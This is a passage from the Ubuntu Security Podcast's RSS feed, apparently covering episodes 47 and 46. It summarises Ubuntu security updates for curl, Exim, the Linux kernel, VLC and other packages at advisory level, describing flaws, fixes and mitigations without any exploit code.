<h3 id="usn-4129-1-usn-4129-2-curl-vulnerabilities-05-42">[<a href="https://usn.ubuntu.com/4129-1/">USN-4129-1</a>, <a href="https://usn.ubuntu.com/4129-2/">USN-4129-2</a>] curl vulnerabilities [05:42]</h3>
<ul>
<li>1 CVEs addressed in Precise ESM, Trusty ESM, Xenial, Bionic, Disco
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-5482">CVE-2019-5482</a> <!-- raw HTML omitted -->
<ul>
<li>Heap buffer overflow in TFTP protocol handler</li>
</ul>
</li>
</ul>
</li>
<li>1 extra CVEs addressed in Xenial, Bionic, Disco
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-5481">CVE-2019-5481</a> <!-- raw HTML omitted -->
<ul>
<li>Double free in FTP-kerberos code</li>
</ul>
</li>
</ul>
</li>
</ul>
<h3 id="usn-4130-1-webkitgtk-plus-vulnerabilities-06-15">[<a href="https://usn.ubuntu.com/4130-1/">USN-4130-1</a>] WebKitGTK+ vulnerabilities [06:15]</h3>
<ul>
<li>16 CVEs addressed in Bionic, Disco
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-8690">CVE-2019-8690</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-8689">CVE-2019-8689</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-8688">CVE-2019-8688</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-8687">CVE-2019-8687</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-8684">CVE-2019-8684</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-8683">CVE-2019-8683</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-8681">CVE-2019-8681</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-8680">CVE-2019-8680</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-8678">CVE-2019-8678</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-8676">CVE-2019-8676</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-8673">CVE-2019-8673</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-8669">CVE-2019-8669</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-8666">CVE-2019-8666</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-8658">CVE-2019-8658</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-8649">CVE-2019-8649</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-8644">CVE-2019-8644</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Update to latest WebKitGTK upstream release (2.24.4)</li>
</ul>
<h3 id="usn-4131-1-vlc-vulnerabilities-06-38">[<a href="https://usn.ubuntu.com/4131-1/">USN-4131-1</a>] VLC vulnerabilities [06:38]</h3>
<ul>
<li>11 CVEs addressed in Bionic, Disco
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-14970">CVE-2019-14970</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-14778">CVE-2019-14778</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-14777">CVE-2019-14777</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-14776">CVE-2019-14776</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-14535">CVE-2019-14535</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-14534">CVE-2019-14534</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-14533">CVE-2019-14533</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-14498">CVE-2019-14498</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-14438">CVE-2019-14438</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-14437">CVE-2019-14437</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-13962">CVE-2019-13962</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Update to latest VLC upstream release (3.0.8)</li>
</ul>
<h3 id="usn-4133-1-wireshark-vulnerabilities-06-48">[<a href="https://usn.ubuntu.com/4133-1/">USN-4133-1</a>] Wireshark vulnerabilities [06:48]</h3>
<ul>
<li>2 CVEs addressed in Xenial, Bionic, Disco
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-13619">CVE-2019-13619</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-12295">CVE-2019-12295</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Update to latest upstream release (2.6.10-1)</li>
</ul>
<h3 id="usn-4132-1-usn-4132-2-expat-vulnerability-06-55">[<a href="https://usn.ubuntu.com/4132-1/">USN-4132-1</a>, <a href="https://usn.ubuntu.com/4132-2/">USN-4132-2</a>] Expat vulnerability [06:55]</h3>
<ul>
<li>1 CVEs addressed in Precise ESM, Trusty ESM, Xenial, Bionic, Disco
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-15903">CVE-2019-15903</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Crafted XML could fool the parser to switch to document parsing too early
(whilst still in DTD) - could then result in a heap-based buffer
over-read when looking up current line / column number - possible crash
-&gt; DoS</li>
</ul>
<h3 id="usn-4134-1-ibus-vulnerability-07-30">[<a href="https://usn.ubuntu.com/4134-1/">USN-4134-1</a>] IBus vulnerability [07:30]</h3>
<ul>
<li>1 CVEs addressed in Xenial, Bionic, Disco
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-14822">CVE-2019-14822</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Failed to apply access controls to D-Bus server socket - could allow
another local user to connect to logged in local user&rsquo;s IBus daemon and
snoop on keystrokes etc
<ul>
<li>Attacker needs to know IBus socket address which is randomised and not
easily discoverable</li>
</ul>
</li>
</ul>
<h3 id="usn-4134-2-ibus-regression-08-00">[<a href="https://usn.ubuntu.com/4134-2/">USN-4134-2</a>] IBus regression [08:00]</h3>
<ul>
<li>Affecting Xenial, Bionic, Disco</li>
<li>Regressed for Qt users - Qt seems unable to connect to IBus socket - so
reverted</li>
</ul>
<h3 id="usn-4124-2-exim-vulnerability-08-25">[<a href="https://usn.ubuntu.com/4124-2/">USN-4124-2</a>] Exim vulnerability [08:25]</h3>
<ul>
<li>1 CVEs addressed in Trusty ESM
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-15846">CVE-2019-15846</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li><a href="https://ubuntusecuritypodcast.org/episode-46/">Episode 46</a> - high profile possible remote root exploit</li>
</ul>
<h3 id="usn-4113-2-apache-http-server-regression-08-38">[<a href="https://usn.ubuntu.com/4113-2/">USN-4113-2</a>] Apache HTTP Server regression [08:38]</h3>
<ul>
<li>Affecting Xenial, Bionic, Disco</li>
<li><a href="https://ubuntusecuritypodcast.org/episode-45/">Episode 45</a> - HTTP/2 DoS issues - update caused a regression when proxying
balance manager connections - fixed by incorporating missing upstream
patches</li>
</ul>
<h3 id="usn-4135-1-usn-4135-2-linux-kernel-vulnerabilities-09-01">[<a href="https://usn.ubuntu.com/4135-1/">USN-4135-1</a>, <a href="https://usn.ubuntu.com/4135-2/">USN-4135-2</a>] Linux kernel vulnerabilities [09:01]</h3>
<ul>
<li>3 CVEs addressed in Precise ESM, Trusty ESM, Xenial, Bionic, Disco
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-15031">CVE-2019-15031</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-15030">CVE-2019-15030</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-14835">CVE-2019-14835</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Possible host privilege escalation from a libvirt guest (guest user needs
to be privileged)</li>
<li>2 related info disclosures on PowerPC - local user could possibly read
vector registers of other users&rsquo; processes either during an interrupt or
via a facility unavailable exception</li>
</ul>
<h3 id="lsn-0056-1-linux-kernel-vulnerability-09-51">[LSN-0056-1] Linux kernel vulnerability [09:51]</h3>
<ul>
<li>1 CVEs addressed in Xenial, Bionic
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-14835">CVE-2019-14835</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Livepatch notification of above libvirt host privesc</li>
</ul>
<h3 id="usn-4136-1-usn-4136-2-wpa-supplicant-and-hostapd-vulnerability-10-06">[<a href="https://usn.ubuntu.com/4136-1/">USN-4136-1</a>, <a href="https://usn.ubuntu.com/4136-2/">USN-4136-2</a>] wpa_supplicant and hostapd vulnerability [10:06]</h3>
<ul>
<li>1 CVEs addressed in Precise ESM, Trusty ESM, Xenial, Bionic, Disco
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-16275">CVE-2019-16275</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Attacker in radio range could cause a station to disconnect by sending a
specially crafted management frame (since would not properly validate the
source address of the frame)</li>
</ul>
<h3 id="usn-4137-1-mosquitto-vulnerability-10-44">[<a href="https://usn.ubuntu.com/4137-1/">USN-4137-1</a>] Mosquitto vulnerability [10:44]</h3>
<ul>
<li>1 CVEs addressed in Disco
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-11779">CVE-2019-11779</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Stack overflow if a malicious client sends a SUBSCRIBE with a topic of
~65k &lsquo;/&rsquo; characters</li>
</ul>
<h3 id="usn-4138-1-libreoffice-vulnerability-10-56">[<a href="https://usn.ubuntu.com/4138-1/">USN-4138-1</a>] LibreOffice vulnerability [10:56]</h3>
<ul>
<li>1 CVEs addressed in Xenial, Bionic, Disco
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-9854">CVE-2019-9854</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li><a href="https://ubuntusecuritypodcast.org/episode-44/">Episode 44</a> - able to bypass protections added to try and stop inclusion
of code on local file-system in macros etc via URL encoding</li>
</ul>
<h3 id="usn-4139-1-file-roller-vulnerability-11-18">[<a href="https://usn.ubuntu.com/4139-1/">USN-4139-1</a>] File Roller vulnerability [11:18]</h3>
<ul>
<li>1 CVEs addressed in Xenial, Bionic
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-16680">CVE-2019-16680</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Path traversal outside of CWD to parent</li>
</ul>
<h3 id="usn-4140-1-firefox-vulnerability-11-33">[<a href="https://usn.ubuntu.com/4140-1/">USN-4140-1</a>] Firefox vulnerability [11:33]</h3>
<ul>
<li>1 CVEs addressed in Xenial, Bionic, Disco
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-11754">CVE-2019-11754</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Latest upstream release (69.0.1) - pointer lock able to be enabled
without any notification to user - could allow a malicious website to
hijack mouse cursor and confuse user</li>
</ul>
<h3 id="usn-4141-1-exim-vulnerability-11-54">[<a href="https://usn.ubuntu.com/4141-1/">USN-4141-1</a>] Exim vulnerability [11:54]</h3>
<ul>
<li>1 CVEs addressed in Disco
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-16928">CVE-2019-16928</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Heap-based buffer overflow - could possibly allow remote code execution -
was announced on Saturday 28th - thanks Marc for the quick update :)</li>
</ul>
<h2 id="goings-on-in-ubuntu-security-community">Goings on in Ubuntu Security Community</h2>
<h3 id="joe-and-alex-talk-about-the-paris-engineering-sprint-and-joe-s-recent-article-in-admin-magazine-12-42">Joe and Alex talk about the Paris Engineering Sprint and Joe&rsquo;s recent article in Admin Magazine [12:42]</h3>
<ul>
<li><a href="http://www.admin-magazine.com/Articles/Build-a-honeypot-with-real-world-alerts?utm_source=AMTW">http://www.admin-magazine.com/Articles/Build-a-honeypot-with-real-world-alerts?utm_source=AMTW</a></li>
<li><a href="https://github.com/joemcmanus/honeybot">https://github.com/joemcmanus/honeybot</a></li>
</ul>
<h3 id="new-security-category-on-discourse-dot-ubuntu-dot-com-25-52">New security category on discourse.ubuntu.com [25:52]</h3>
<ul>
<li><a href="https://discourse.ubuntu.com/c/security">https://discourse.ubuntu.com/c/security</a></li>
<li>Created to allow discussion of security relevant Ubuntu topics and issues
in a more user-friendly and centralised location
<ul>
<li>Will be used in addition to the existing <a href="https://lists.ubuntu.com/mailman/listinfo/ubuntu-hardened">ubuntu-hardened mailing list</a>
and <a href="http://webchat.freenode.net/#ubuntu-hardened">#ubuntu-hardened IRC channel</a></li>
</ul>
</li>
</ul>
<h2 id="get-in-contact">Get in contact</h2>
<ul>
<li><a href="mailto:security@ubuntu.com">security@ubuntu.com</a></li>
<li><a href="https://libera.chat">#ubuntu-security on the Libera.Chat IRC network</a></li>
<li><a href="https://lists.ubuntu.com/mailman/listinfo/ubuntu-hardened">ubuntu-hardened mailing list</a></li>
<li><a href="https://discourse.ubuntu.com/c/security">Security section on discourse.ubuntu.com</a></li>
<li><a href="https://twitter.com/ubuntu_sec">@ubuntu_sec on twitter</a></li>
</ul>
]]></content:encoded><itunes:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></itunes:image>
          <googleplay:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></googleplay:image><enclosure url="https://people.canonical.com/~amurray/USP/USP_E047.mp3" length="36399340" type="audio/mpeg" /><itunes:duration>28:26</itunes:duration><itunes:explicit>false</itunes:explicit>
          <googleplay:explicit>no</googleplay:explicit></item>
        <item>
          
            <title>Episode 46
          
          
          </title>
          <link>https://ubuntusecuritypodcast.org/episode-46/</link>
          <pubDate>Thu, 12 Sep 2019 23:02:00 +0930 </pubDate>
          <dc:creator></dc:creator>
          <guid>f9f8ca97c8a93a7d0f78e192f4103ef26bcd7f06d318c0a10eaaddd1a5cad87fe4347f2bf2a967b0b2b4c56fdbce6d261f047fc9c17ee8542b54e5477ce71a99</guid>
          <itunes:author>Ubuntu Security Team</itunes:author>
          
        
          <itunes:title>Episode 46</itunes:title>
        
        <itunes:subtitle><![CDATA[
        
          A massive 85 CVEs addressed this week, including updates for Exim, the
  Linux Kernel, Samba, systemd and more, plus we discuss hacking BMCs via
  remote USB devices and password stashes.
  
        
        ]]></itunes:subtitle>
        <itunes:summary>  A massive 85 CVEs addressed this week, including updates for Exim, the
  Linux Kernel, Samba, systemd and more, plus we discuss hacking BMCs via
  remote USB devices and password stashes.
  </itunes:summary>
        <description>  A massive 85 CVEs addressed this week, including updates for Exim, the
  Linux Kernel, Samba, systemd and more, plus we discuss hacking BMCs via
  remote USB devices and password stashes.
  </description>
        <googleplay:description>  A massive 85 CVEs addressed this week, including updates for Exim, the
  Linux Kernel, Samba, systemd and more, plus we discuss hacking BMCs via
  remote USB devices and password stashes.
  </googleplay:description>
        <content:encoded><![CDATA[<h2 id="overview">Overview</h2>
<p>A massive 85 CVEs addressed this week, including updates for Exim, the
Linux Kernel, Samba, systemd and more, plus we discuss hacking BMCs via
remote USB devices and password stashes.</p>
<h2 id="this-week-in-ubuntu-security-updates">This week in Ubuntu Security Updates</h2>
<p>85 unique CVEs addressed</p>
<h3 id="usn-4124-1-exim-vulnerability-00-49">[<a href="https://usn.ubuntu.com/4124-1/">USN-4124-1</a>] Exim vulnerability [00:49]</h3>
<ul>
<li>1 CVEs addressed in Xenial, Bionic, Disco
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-15846">CVE-2019-15846</a> <!-- raw HTML omitted -->
<ul>
<li>When doing TLS negotiation, parses the Server Name Indication
headers - would try and handle escape sequences in this string.</li>
<li>Does so by looking at the character after a backslash to determine
what escape sequence is (\b etc) and then returns that actual value
(in string_interpret_escape())</li>
<li>This gets called by the function string_unprinting() which is used to
translate escaped characters into their proper form in a new string -
and this will run over the bounds of the original string if it ends
with a backslash - since string_interpret_escape() would assume there
was contents afterwards to interpret</li>
<li>Qualsys were able to develop a PoC which leverages this OOB behaviour
into a remote root exploit (since this part of the code runs as root
and they were able to use a combination of heap corruption and OOB
writes to get code execution)</li>
<li>Fixed to first check if reached end of string (NUL) before trying to
handle the escaped character</li>
</ul>
</li>
<li>Able to be mitigated by setting ACLs to deny connections which contain
a trailing backslash in the SNI field - see <a href="https://ubuntu.com/security/CVE-2019-15846">CVE-2019-15846 in the Ubuntu CVE Tracker</a></li>
<li>Lots of press coverage:
<ul>
<li><a href="https://www.zdnet.com/article/millions-of-exim-servers-vulnerable-to-root-granting-exploit/">https://www.zdnet.com/article/millions-of-exim-servers-vulnerable-to-root-granting-exploit/</a></li>
<li><a href="https://threatpost.com/critical-exim-flaw-opens-millions-of-servers-to-takeover/148108/">https://threatpost.com/critical-exim-flaw-opens-millions-of-servers-to-takeover/148108/</a></li>
<li><a href="https://www.theregister.co.uk/2019/09/06/exim_vulnerability_patch/">https://www.theregister.co.uk/2019/09/06/exim_vulnerability_patch/</a></li>
<li><a href="https://www.bleepingcomputer.com/news/security/critical-exim-tls-flaw-lets-attackers-remotely-execute-commands-as-root/">https://www.bleepingcomputer.com/news/security/critical-exim-tls-flaw-lets-attackers-remotely-execute-commands-as-root/</a></li>
</ul>
</li>
</ul>
</li>
</ul>
<h3 id="usn-4114-1-linux-kernel-vulnerabilities-03-49">[<a href="https://usn.ubuntu.com/4114-1/">USN-4114-1</a>] Linux kernel vulnerabilities [03:49]</h3>
<ul>
<li>5 CVEs addressed in Bionic (HWE), Disco
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-3900">CVE-2019-3900</a> <!-- raw HTML omitted -->
<ul>
<li>Infinite loop in virtio network driver - guest VM cause host DoS by stalling vhost_net kernel thread</li>
</ul>
</li>
<li><a href="https://ubuntu.com/security/CVE-2019-14284">CVE-2019-14284</a> <!-- raw HTML omitted -->
<ul>
<li>Divide by zero in floppy driver ioctl() handler (created by default by qemu)</li>
</ul>
</li>
<li><a href="https://ubuntu.com/security/CVE-2019-14283">CVE-2019-14283</a> <!-- raw HTML omitted -->
<ul>
<li>Integer overflow and OOB read in floppy driver</li>
</ul>
</li>
<li><a href="https://ubuntu.com/security/CVE-2019-13648">CVE-2019-13648</a> <!-- raw HTML omitted -->
<ul>
<li>DoS for PowerPC if user calls sigreturn() with crafted signal stack
frame - exception and system crash (requires transactional memory to
be disabled)</li>
</ul>
</li>
<li><a href="https://ubuntu.com/security/CVE-2019-10638">CVE-2019-10638</a> <!-- raw HTML omitted -->
<ul>
<li>Kernel tries to randomise IP ID values (used for de-fragmentation of
IP packets) for connection-less protocols to avoid tracking</li>
<li>Is meant to be random across source + dest address + protocol</li>
<li>But if an attacker can observe traffic to multiple hosts, can infer
the hashing key used to generate the ID values</li>
<li>And then can associate different streams of packets back to the same
source host and hence can track devices</li>
<li>Fixed to used an actual random value for the base of the hash and use
a better hashing algorithm (siphash) for ID generation</li>
</ul>
</li>
</ul>
</li>
</ul>
<h3 id="usn-4115-1-linux-kernel-vulnerabilities-06-42">[<a href="https://usn.ubuntu.com/4115-1/">USN-4115-1</a>] Linux kernel vulnerabilities [06:42]</h3>
<ul>
<li>28 CVEs addressed in Xenial (HWE), Bionic</li>
<li>5 negligible (not enabled by default), 11 low (very unlikely to trigger -
module unload after proc initialization failure etc), 12 medium
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-3819">CVE-2019-3819</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-3701">CVE-2019-3701</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-15221">CVE-2019-15221</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-15218">CVE-2019-15218</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-15216">CVE-2019-15216</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-9506">CVE-2019-9506</a> <!-- raw HTML omitted -->
<ul>
<li>Bluetooth KNOB attack</li>
</ul>
</li>
<li><a href="https://ubuntu.com/security/CVE-2019-3900">CVE-2019-3900</a> <!-- raw HTML omitted -->
<ul>
<li>Infinite loop in virtio net driver (guest VM cause host DoS)</li>
</ul>
</li>
<li><a href="https://ubuntu.com/security/CVE-2019-15292">CVE-2019-15292</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-15220">CVE-2019-15220</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-15215">CVE-2019-15215</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-15214">CVE-2019-15214</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-15212">CVE-2019-15212</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-15211">CVE-2019-15211</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-15090">CVE-2019-15090</a> <!-- raw HTML omitted -->
<ul>
<li>OOB read in debug functions of QLogic QEDI iSCSI Initiator Driver
(allows to read kernel memory - KASLR defeat?)</li>
</ul>
</li>
<li><a href="https://ubuntu.com/security/CVE-2019-14763">CVE-2019-14763</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-14284">CVE-2019-14284</a> <!-- raw HTML omitted -->
<ul>
<li>See above (Divide by zero in floppy driver)</li>
</ul>
</li>
<li><a href="https://ubuntu.com/security/CVE-2019-14283">CVE-2019-14283</a> <!-- raw HTML omitted -->
<ul>
<li>See above (Integer overflow and OOB read in floppy driver)</li>
</ul>
</li>
<li><a href="https://ubuntu.com/security/CVE-2019-13648">CVE-2019-13648</a> <!-- raw HTML omitted -->
<ul>
<li>See above (PowerPC DoS on sigreturn())</li>
</ul>
</li>
<li><a href="https://ubuntu.com/security/CVE-2019-13631">CVE-2019-13631</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-11810">CVE-2019-11810</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-11599">CVE-2019-11599</a> <!-- raw HTML omitted -->
<ul>
<li>Core dump race (<a href="https://ubuntusecuritypodcast.org/episode-41/">Episode 41</a>)</li>
</ul>
</li>
<li><a href="https://ubuntu.com/security/CVE-2019-11487">CVE-2019-11487</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-10639">CVE-2019-10639</a> <!-- raw HTML omitted -->
<ul>
<li>Related to CVE-2019-10638 - since used base address of kernel
structure in memory as hash base, could allow attacker to infer this
address and so defeat KASLR</li>
</ul>
</li>
<li><a href="https://ubuntu.com/security/CVE-2019-10638">CVE-2019-10638</a> <!-- raw HTML omitted -->
<ul>
<li>See above (IP ID randomisation)</li>
</ul>
</li>
<li><a href="https://ubuntu.com/security/CVE-2019-10207">CVE-2019-10207</a> <!-- raw HTML omitted -->
<ul>
<li>NULL pointer address execution (call function pointer which is NULL
since is not initializated) - Ubuntu defaults to a non-zero
mmap_min_addr value which means can&rsquo;t map a page at 0 address so this
is just a NULL pointer dereference in default config (otherwise is
arbitrary kernel code execution)</li>
</ul>
</li>
<li><a href="https://ubuntu.com/security/CVE-2019-0136">CVE-2019-0136</a> <!-- raw HTML omitted -->
<ul>
<li>Intel Wifi Driver Tunneled Direct Link Setup (allows devices to
communicate directly with one-another on the same network without
going via AP) - flaw allows a peer to cause wifi disconnection (DoS)</li>
</ul>
</li>
<li><a href="https://ubuntu.com/security/CVE-2018-20784">CVE-2018-20784</a> <!-- raw HTML omitted -->
<ul>
<li>Infinite loop in CFS schedular - DoS</li>
</ul>
</li>
<li><a href="https://ubuntu.com/security/CVE-2018-19985">CVE-2018-19985</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-4116-1-linux-kernel-vulnerabilities-09-12">[<a href="https://usn.ubuntu.com/4116-1/">USN-4116-1</a>] Linux kernel vulnerabilities [09:12]</h3>
<ul>
<li>6 CVEs addressed in Xenial
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-3900">CVE-2019-3900</a> <!-- raw HTML omitted -->
<ul>
<li>Infinite loop in virtio net driver (guest VM cause host DoS)</li>
</ul>
</li>
<li><a href="https://ubuntu.com/security/CVE-2019-14284">CVE-2019-14284</a> <!-- raw HTML omitted -->
<ul>
<li>See above (Divide by zero in floppy driver)</li>
</ul>
</li>
<li><a href="https://ubuntu.com/security/CVE-2019-14283">CVE-2019-14283</a> <!-- raw HTML omitted -->
<ul>
<li>See above (Integer overflow and OOB read in floppy driver)</li>
</ul>
</li>
<li><a href="https://ubuntu.com/security/CVE-2019-13648">CVE-2019-13648</a> <!-- raw HTML omitted -->
<ul>
<li>See above (PowerPC DoS on sigreturn())</li>
</ul>
</li>
<li><a href="https://ubuntu.com/security/CVE-2019-10638">CVE-2019-10638</a> <!-- raw HTML omitted -->
<ul>
<li>See above (IP ID randomisation)</li>
</ul>
</li>
<li><a href="https://ubuntu.com/security/CVE-2018-20856">CVE-2018-20856</a> <!-- raw HTML omitted -->
<ul>
<li>UAF in block-layer under particular failure conditions</li>
</ul>
</li>
</ul>
</li>
</ul>
<h3 id="usn-4117-1-linux-kernel--aws--vulnerabilities-09-43">[<a href="https://usn.ubuntu.com/4117-1/">USN-4117-1</a>] Linux kernel (AWS) vulnerabilities [09:43]</h3>
<ul>
<li>9 CVEs addressed in Disco
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-3900">CVE-2019-3900</a> <!-- raw HTML omitted -->
<ul>
<li>Infinite loop in virtio net driver (guest VM cause host DoS)</li>
</ul>
</li>
<li><a href="https://ubuntu.com/security/CVE-2019-3846">CVE-2019-3846</a> <!-- raw HTML omitted -->
<ul>
<li>Marvell Wifi OOB write (<a href="https://ubuntusecuritypodcast.org/episode-43/">Episode 43</a>)</li>
</ul>
</li>
<li><a href="https://ubuntu.com/security/CVE-2019-10126">CVE-2019-10126</a> <!-- raw HTML omitted -->
<ul>
<li>Marvell Wifi OOB write (<a href="https://ubuntusecuritypodcast.org/episode-43/">Episode 43</a>)</li>
</ul>
</li>
<li><a href="https://ubuntu.com/security/CVE-2019-14284">CVE-2019-14284</a> <!-- raw HTML omitted -->
<ul>
<li>See above (Divide by zero in floppy driver)</li>
</ul>
</li>
<li><a href="https://ubuntu.com/security/CVE-2019-14283">CVE-2019-14283</a> <!-- raw HTML omitted -->
<ul>
<li>See above (Integer overflow and OOB read in floppy driver)</li>
</ul>
</li>
<li><a href="https://ubuntu.com/security/CVE-2019-13272">CVE-2019-13272</a> <!-- raw HTML omitted -->
<ul>
<li>ptrace race (<a href="https://ubuntusecuritypodcast.org/episode-43/">Episode 43</a>)</li>
</ul>
</li>
<li><a href="https://ubuntu.com/security/CVE-2019-13233">CVE-2019-13233</a> <!-- raw HTML omitted -->
<ul>
<li>UAF in handling of x86 LDT entries (<a href="https://ubuntusecuritypodcast.org/episode-43/">Episode 43</a>)</li>
</ul>
</li>
<li><a href="https://ubuntu.com/security/CVE-2019-12984">CVE-2019-12984</a> <!-- raw HTML omitted -->
<ul>
<li>NULL ptr dereference in NFC subsystem (<a href="https://ubuntusecuritypodcast.org/episode-43/">Episode 43</a>)</li>
</ul>
</li>
<li><a href="https://ubuntu.com/security/CVE-2019-10638">CVE-2019-10638</a> <!-- raw HTML omitted -->
<ul>
<li>See above (IP ID randomisation)</li>
</ul>
</li>
</ul>
</li>
</ul>
<h3 id="usn-4118-1-linux-kernel--aws--vulnerabilities-10-17">[<a href="https://usn.ubuntu.com/4118-1/">USN-4118-1</a>] Linux kernel (AWS) vulnerabilities [10:17]</h3>
<ul>
<li>61 CVEs addressed in Xenial, Bionic
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-3819">CVE-2019-3819</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-3701">CVE-2019-3701</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-15221">CVE-2019-15221</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-15218">CVE-2019-15218</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-15216">CVE-2019-15216</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-20511">CVE-2018-20511</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-9506">CVE-2019-9506</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-3900">CVE-2019-3900</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-3846">CVE-2019-3846</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-2101">CVE-2019-2101</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-2024">CVE-2019-2024</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-15292">CVE-2019-15292</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-15220">CVE-2019-15220</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-15215">CVE-2019-15215</a> <!-- raw HTML omitted --></li>
